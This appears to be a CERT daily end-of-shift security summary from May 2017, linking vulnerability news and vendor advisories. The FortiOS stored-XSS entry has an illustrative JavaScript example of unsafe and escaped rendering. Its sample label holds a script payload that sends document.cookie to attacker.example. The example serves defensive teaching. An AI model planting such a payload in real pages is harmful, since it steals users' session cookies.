Daily summary - Wednesday 17-05-2017

End-of-Shift report

Timeframe: Tuesday 16-05-2017 18:00 − Wednesday 17-05-2017 18:00 Handler: Stephan Richter Co-Handler: n/a

Patch now: Dangerous security vulnerability in Joomla

With version 3.7.1 the Joomla team closes an SQL injection vulnerability that can have fatal consequences. Joomla admins should react promptly.

https://heise.de/-3716175


WordPress update 4.7.5 closes six security vulnerabilities

None of the vulnerabilities is rated critical, but admins should nevertheless take care of the XSS and CSRF vulnerabilities.

https://heise.de/-3716055


Extending Microsoft Edge Bounty Program

Over the past 10 months, we've paid out more than $200,000 USD in bounties to researchers reporting vulnerabilities through the Microsoft Edge Bounty Program. Partnering with the research community has helped improve Microsoft Edge security, and to continue this collaboration, today we're extending the end date of the Edge on Windows Insider Preview (WIP) bounty...

https://blogs.technet.microsoft.com/msrc/2017/05/16/extending-microsoft-edge-bounty-program/


BSI publishes minimum standard for Mobile Device Management

The minimum standard defines, in 40 technical and organisational rules, the requirements for MDM systems of the German federal administration and for their operation. It specifies which policies a system must be able to enforce, but leaves room in how they are implemented.

https://heise.de/-3715500


Basic Best Practices for Securing LDAP and Active Directory with Red Hat

In the enterprise, it's very popular to manage Windows client PCs through Red Hat servers. This sort of configuration is especially common in the healthcare and financial services industries. Red Hat Enterprise Linux (RHEL) has good software for working with Windows Active Directory. Red Hat Enterprise Linux can also manage clients on multiple platforms, such as Windows, OS X, Android, and other Linux distributions, with OpenLDAP, an open-source implementation of the Lightweight Directory Access [...]

https://www.alienvault.com/blogs/security-essentials/basic-best-practices-for-securing-ldap-and-active-directory-with-red-hat


Fake easybank letter: account blocked

Criminals are sending a fake easybank message. It claims that unknown persons have accessed the account. Customers are therefore asked to visit a website, disclose personal banking details and confirm their account. Anyone who provides the requested information hands it straight to criminals.

https://www.watchlist-internet.at/phishing/gefaelschtes-easybank-schreiben-konto-gesperrt/


Why Phishing Attacks Succeed

The first time I received a "secure" email message from my bank, I was a bit suspicious of what I was actually seeing. It looked too much like a phishing attempt for my comfort. The message in my inbox was from my banker's email address, not from Chase directly. It also included an attached HTML page and instructions to "open the attached page in a browser for instructions on how to proceed."

https://ttmm.io/tech/why-phishing-attacks-succeed/


How Big Fuzzing helps find holes in open source projects

Google's beta project, OSS-Fuzz, has found 264 vulnerabilities in 47 open-source projects - so is it an idea whose time has come?

https://nakedsecurity.sophos.com/2017/05/17/how-big-fuzzing-helps-find-holes-in-open-source-projects/


Security Advisory - DoS Vulnerability in Some Huawei Products

http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170517-01-ac-en


SSB-421479 (Last Update 2017-05-16): Customer Information on WannaCry Malware for Siemens Healthineers Imaging and Diagnostics Products

https://www.siemens.com/cert/pool/cert/siemens_security_bulletin_ssb-421479.pdf


Indicators Associated With WannaCry Ransomware (Update A)

This updated alert is a follow-up to the original alert titled ICS-ALERT-17-135-01 Indicators Associated With WannaCry Ransomware that was published May 15, 2017, on the NCCIC/ICS-CERT web site.

https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-135-01A


FortiOS stored XSS vulnerability in the policy global-label parameter

FortiOS is subject to a stored Cross-Site Scripting vulnerability, due to an improperly sanitized parameter in a hidden CLI configuration setting named global-label. It can, however, only be exploited by an administrator with write privileges, which limits the impact to abuse by, or compromise of, an already privileged account.

http://fortiguard.com/psirt/FG-IR-17-057
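The advisory is a reminder that a value which is only settable from a "hidden" CLI parameter is still untrusted input once the web UI renders it. The following is an added illustration of the general stored-XSS pattern and its fix, written for this summary; it is not Fortinet code and says nothing about how FortiOS actually renders the label. The policy object, the field name globalLabel, the render functions and the sample payload are all constructed for the example.

```javascript
// Illustrative stored-XSS pattern (added example, not FortiOS code).
// A configuration field such as a policy label is written once by an
// administrator and later rendered into the management web UI. If the
// stored value is concatenated into HTML verbatim, any markup it carries
// executes in the browser of whoever views that page.

// Minimal HTML entity encoder for text placed between tags or inside
// double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[ch]);
}

// Vulnerable rendering: the stored label lands in the page untouched.
function renderPolicyRowUnsafe(policy) {
  return `<tr><td>${policy.id}</td><td>${policy.globalLabel}</td></tr>`;
}

// Hardened rendering: every field that originates from configuration is
// encoded for the HTML context it is inserted into.
function renderPolicyRowSafe(policy) {
  return `<tr><td>${escapeHtml(policy.id)}</td><td>${escapeHtml(policy.globalLabel)}</td></tr>`;
}

// Constructed sample: a policy whose label carries a script payload, as a
// privileged but malicious (or compromised) admin could set via the CLI.
const samplePolicy = {
  id: 7,
  globalLabel: '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
};

// Quick check used to compare the two renderers: does the produced HTML
// still contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe:', renderPolicyRowUnsafe(samplePolicy));
console.log('safe  :', renderPolicyRowSafe(samplePolicy));
```

Encoding at output time is the generic fix; rejecting or normalising the label at configuration time is a useful second layer but not a substitute, because the same value may later be rendered in more than one context (HTML body, attribute, JSON), each of which needs its own encoding.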


NTP vulnerability CVE-2017-6463

Security Advisory description: NTP before 4.2.8p10 and 4.3.x before ...

https://support.f5.com/csp/article/K02951273


Linux kernel vulnerability CVE-2017-8106

Security Advisory description: The handle_invept function ...

https://support.f5.com/csp/article/K34886212


Schneider Electric VAMPSET

This advisory contains mitigation details for a memory corruption vulnerability in Schneider Electric's VAMPSET.

https://ics-cert.us-cert.gov/advisories/ICSA-17-136-04


Detcon SiteWatch Gateway

This advisory contains mitigation details for an authentication bypass vulnerability and a plaintext password storage vulnerability in Detcon's SiteWatch Gateway.

https://ics-cert.us-cert.gov/advisories/ICSA-17-136-01


Hanwha Techwin SRN-4000

This advisory contains mitigation details for an unauthenticated access vulnerability in Hanwha Techwin's SRN-4000.

https://ics-cert.us-cert.gov/advisories/ICSA-17-136-03


Schneider Electric SoMachine HVAC

This advisory contains mitigation details for buffer overflow and DLL hijack vulnerabilities in Schneider Electric's SoMachine HVAC.

https://ics-cert.us-cert.gov/advisories/ICSA-17-136-02


IBM Security Bulletins

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security Network Protection

http://www-01.ibm.com/support/docview.wss?uid=swg21999513

IBM Security Bulletin: Vulnerabilities in IBM Java SDK affect IBM Algo One Algo Risk Application and Core (CVE-2016-5546, CVE-2016-5548, CVE-2016-5549, CVE-2016-5547, CVE-2016-2183)

http://www.ibm.com/support/docview.wss?uid=swg22000818

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Installation Manager and IBM Packaging Utility

http://www-01.ibm.com/support/docview.wss?uid=swg22003157

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Monitoring

http://www.ibm.com/support/docview.wss?uid=swg22002865

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Integration Designer and WebSphere Integration Developer

http://www-01.ibm.com/support/docview.wss?uid=swg22002555

IBM Security Bulletin: Vulnerability in Apache Tomcat affects IBM Algo One Core (CVE-2016-8745)

http://www.ibm.com/support/docview.wss?uid=swg22001932

IBM Security Bulletin: A vulnerability in OpenSSH affects IBM Security Network Protection (CVE-2015-8325)

http://www-01.ibm.com/support/docview.wss?uid=swg21999248

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime IBM affect IBM Decision Optimization Center and IBM ILOG ODM Enterprise

http://www-01.ibm.com/support/docview.wss?uid=swg22003304

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM ILOG CPLEX Optimization Studio

http://www-01.ibm.com/support/docview.wss?uid=swg22003305

IBM Security Bulletin: Vulnerabilities in GNU C library (glibc) affect IBM Security Network Protection

http://www-01.ibm.com/support/docview.wss?uid=swg22001907

IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Security Network Protection (CVE-2016-8610, and CVE-2017-3731)

http://www-01.ibm.com/support/docview.wss?uid=swg21999162

IBM Security Bulletin: Multiple vulnerabilities in NTP affect IBM Security Network Protection

http://www-01.ibm.com/support/docview.wss?uid=swg21999246